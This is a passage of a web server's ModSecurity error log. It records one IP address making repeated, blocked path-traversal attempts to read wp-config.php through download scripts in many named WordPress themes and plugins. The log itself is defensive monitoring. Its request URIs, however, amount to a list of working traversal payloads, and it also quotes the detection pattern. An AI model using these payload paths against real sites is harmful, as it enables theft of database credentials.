/wp-content/themes/focustelecom/download.php?file=..%2F..%2F..%2Fwp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/themes/focustelecom/download.php"] [unique_id "ZN-wcvG_rKmCSnA6LxD5jgAAABE"] [Fri Aug 18 12:54:58.462657 2023] [:error] [pid 18873:tid 140103259199232] [client 87.249.132.213:35428] [client 87.249.132.213] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: %2F..%2F found within REQUEST_URI: /wp-content/themes/irmahulscher/framework/utilities/download/getfile.php?file=..%2F..%2F..%2F..%2F..%2F..%2Fwp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/themes/irmahulscher/framework/utilities/download/getfile.php"] [unique_id "ZN-wcrCcrCl0jrDdhfxXSgAAAFQ"] [Fri Aug 18 12:54:58.567196 2023] [:error] [pid 19445:tid 140103317948160] [client 87.249.132.213:35432] [client 87.249.132.213] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: %2F..%2F found within REQUEST_URI: /wp-content/themes/izerski/download.php?file=..%2F..%2F..%2Fwp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/themes/izerski/download.php"] [unique_id "ZN-wckWc94tsnIsHAQ-XrwAAAM0"] [Fri Aug 18 12:54:58.663840 2023] [:error] [pid 19445:tid 140103326340864] [client 87.249.132.213:35436] [client 87.249.132.213] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: %2F..%2F found within REQUEST_URI: /wp-content/themes/kioskpolis/download.php?file=..%2F..%2F..%2Fwp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/themes/kioskpolis/download.php"] [unique_id "ZN-wckWc94tsnIsHAQ-XsAAAAMw"] [Fri Aug 18 12:54:58.758858 2023] [:error] [pid 19445:tid 140103284377344] [client 87.249.132.213:35440] [client 87.249.132.213] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: %2F..%2F found within REQUEST_URI: /wp-content/themes/mantra/download.php?download=..%2F..%2F..%2Fwp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/themes/mantra/download.php"] [unique_id "ZN-wckWc94tsnIsHAQ-XsQAAANE"] [Fri Aug 18 12:54:58.853290 2023] [:error] [pid 18872:tid 140103326340864] [client 87.249.132.213:35442] [client 87.249.132.213] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: %2F..%2F found within REQUEST_URI: /wp-content/themes/melrose/download.php?file=..%2F..%2F..%2Fwp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/themes/melrose/download.php"] [unique_id "ZN-wcvG_rKmCSnA6LxD5jwAAAAw"] [Fri Aug 18 12:54:58.947669 2023] [:error] [pid 19445:tid 140103351518976] [client 87.249.132.213:35444] [client 87.249.132.213] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: %2F..%2F found within REQUEST_URI: /wp-content/themes/mtb/inc/download.php?file=..%2F..%2F..%2F..%2Fwp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/themes/mtb/inc/download.php"] [unique_id "ZN-wckWc94tsnIsHAQ-XsgAAAMk"] [Fri Aug 18 12:54:59.041946 2023] [:error] [pid 18872:tid 140103259199232] [client 87.249.132.213:35446] [client 87.249.132.213] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: %2F..%2F found within REQUEST_URI: /wp-content/themes/niet/download.php?file=..%2F..%2F..%2Fwp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/themes/niet/download.php"] [unique_id "ZN-wc_G_rKmCSnA6LxD5kAAAABQ"] [Fri Aug 18 12:54:59.137424 2023] [:error] [pid 18873:tid 140103499544320] [client 87.249.132.213:35448] [client 87.249.132.213] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: %2F..%2F found within REQUEST_URI: /wp-content/themes/philippineartawards/download.php?file=..%2F..%2F..%2Fwp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/themes/philippineartawards/download.php"] [unique_id "ZN-wc7CcrCl0jrDdhfxXSwAAAEA"] [Fri Aug 18 12:54:59.231932 2023] [:error] [pid 19445:tid 140103343126272] [client 87.249.132.213:35450] [client 87.249.132.213] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: %2F..%2F found within REQUEST_URI: /wp-content/themes/quies/download.php?file=..%2F..%2F..%2Fwp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/themes/quies/download.php"] [unique_id "ZN-wc0Wc94tsnIsHAQ-XswAAAMo"] [Fri Aug 18 12:54:59.326308 2023] [:error] [pid 18873:tid 140103275984640] [client 87.249.132.213:35452] [client 87.249.132.213] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: %2F..%2F found within REQUEST_URI: /wp-content/themes/salutation/framework/utilities/download/getfile.php?file=..%2F..%2F..%2F..%2F..%2F..%2Fwp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/themes/salutation/framework/utilities/download/getfile.php"] [unique_id "ZN-wc7CcrCl0jrDdhfxXTAAAAFI"] [Fri Aug 18 12:54:59.443316 2023] [:error] [pid 18873:tid 140103292770048] [client 87.249.132.213:35454] [client 87.249.132.213] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: %2F..%2F found within REQUEST_URI: /wp-content/themes/trinitytheme/lib/downloadlink.php?file=..%2F..%2F..%2F..%2Fwp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/themes/trinitytheme/lib/downloadlink.php"] [unique_id "ZN-wc7CcrCl0jrDdhfxXTQAAAFA"] [Fri Aug 18 12:54:59.537507 2023] [:error] [pid 18874:tid 140103474366208] [client 87.249.132.213:35456] [client 87.249.132.213] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: %2F..%2F found within REQUEST_URI: /wp-content/themes/wohwiwebcenter-vdwbayern/download.php?file=..%2F..%2F..%2Fwp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/themes/wohwiwebcenter-vdwbayern/download.php"] [unique_id "ZN-wc1xvK4MFoveIP9_KuwAAAIM"] [Fri Aug 18 12:54:59.631798 2023] [:error] [pid 19445:tid 140103309555456] [client 87.249.132.213:35458] [client 87.249.132.213] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: %2F..%2F found within REQUEST_URI: /wp-content/themes/zeebusiness/download.php?download=..%2F..%2F..%2Fwp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/themes/zeebusiness/download.php"] [unique_id "ZN-wc0Wc94tsnIsHAQ-XtAAAAM4"] [Fri Aug 18 12:54:59.726395 2023] [:error] [pid 18873:tid 140103242413824] [client 87.249.132.213:35460] [client 87.249.132.213] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: %2F..%2F found within REQUEST_URI: /wp-content/themes/maronpro/download.php?download=..%2F..%2F..%2Fwp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/themes/maronpro/download.php"] [unique_id "ZN-wc7CcrCl0jrDdhfxXTgAAAFY"] [Fri Aug 18 12:54:59.820851 2023] [:error] [pid 18873:tid 140103368304384] [client 87.249.132.213:35462] [client 87.249.132.213] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: %2F..%2F found within REQUEST_URI: /wp-content/themes/DolarToday/down.php?path=..%2F..%2F..%2Fwp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/themes/DolarToday/down.php"] [unique_id "ZN-wc7CcrCl0jrDdhfxXTwAAAEc"] [Fri Aug 18 12:54:59.918792 2023] [:error] [pid 18873:tid 140103317948160] [client 87.249.132.213:35464] [client 87.249.132.213] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: %2F..%2F found within REQUEST_URI: /wp-content/themes/MusicMaker/download.php?file=..%2F..%2F..%2Fwp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/themes/MusicMaker/download.php"] [unique_id "ZN-wc7CcrCl0jrDdhfxXUAAAAE0"] [Fri Aug 18 12:55:00.013300 2023] [:error] [pid 18873:tid 140103491151616] [client 87.249.132.213:35466] [client 87.249.132.213] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: %2F..%2F found within REQUEST_URI: /wp-content/themes/green_farming_new/download.php?download_file=..%2F..%2F..%2Fwp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/themes/green_farming_new/download.php"] [unique_id "ZN-wdLCcrCl0jrDdhfxXUQAAAEE"] [Fri Aug 18 12:55:00.108381 2023] [:error] [pid 18872:tid 140103309555456] [client 87.249.132.213:35468] [client 87.249.132.213] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: %2F..%2F found within REQUEST_URI: /wp-content/plugins/wordfence/lib/wordfenceClass.php?file=..%2F..%2F..%2F..%2Fwp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/plugins/wordfence/lib/wordfenceClass.php"] [unique_id "ZN-wdPG_rKmCSnA6LxD5kQAAAA4"] [Fri Aug 18 12:55:00.212006 2023] [:error] [pid 19445:tid 140103376697088] [client 87.249.132.213:35470] [client 87.249.132.213] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: %2F..%2F found within REQUEST_URI: /wp-content/plugins/tutor/views/pages/instructors.php?sub_page=..%2F..%2F..%2F..%2F..%2Fwp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/plugins/tutor/views/pages/instructors.php"] [unique_id "ZN-wdEWc94tsnIsHAQ-XtQAAAMY"] [Fri Aug 18 12:55:00.306353 2023] [:error] [pid 19445:tid 140103234021120] [client 87.249.132.213:35472] [client 87.249.132.213] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: %2F..%2F found within REQUEST_URI: /wp-content/plugins/codecanyon-5293356-ajax-store-locator-wordpress/sl_file_download.php?download_file=..%2F..%2F..%2Fwp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/plugins/codecanyon-5293356-ajax-store-locator-wordpress/sl_file_download.php"] [unique_id "ZN-wdEWc94tsnIsHAQ-XtgAAANc"] [Fri Aug 18 12:55:00.402156 2023] [:error] [pid 19445:tid 140103267591936] [client 87.249.132.213:35474] [client 87.249.132.213] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: %2F..%2F found within REQUEST_URI: /wp-content/themes/RedSteel/download.php?file=..%2F..%2F..%2Fwp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/themes/RedSteel/download.php"] [unique_id "ZN-wdEWc94tsnIsHAQ-XtwAAANM"] [Fri Aug 18 12:55:00.495969 2023] [:error] [pid 19445:tid 140103482758912] [client 87.249.132.213:35478] [client 87.249.132.213] ModSecurity: Access denied with code 403 (phase 2). Found 1 byte(s) in ARGS:mp3 outside range: 1-255. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_20_protocol_violations.conf"] [line "534"] [id "960901"] [rev "2"] [msg "Invalid character in request"] [severity "ERROR"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/EVASION"] [hostname "investigacionperu.com"] [uri "/wp-content/plugins/mp3-jplayer/download.php"] [unique_id "ZN-wdEWc94tsnIsHAQ-XuQAAAMI"] [Fri Aug 18 12:55:00.608183 2023] [:error] [pid 18874:tid 140103465973504] [client 87.249.132.213:35480] [client 87.249.132.213] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] 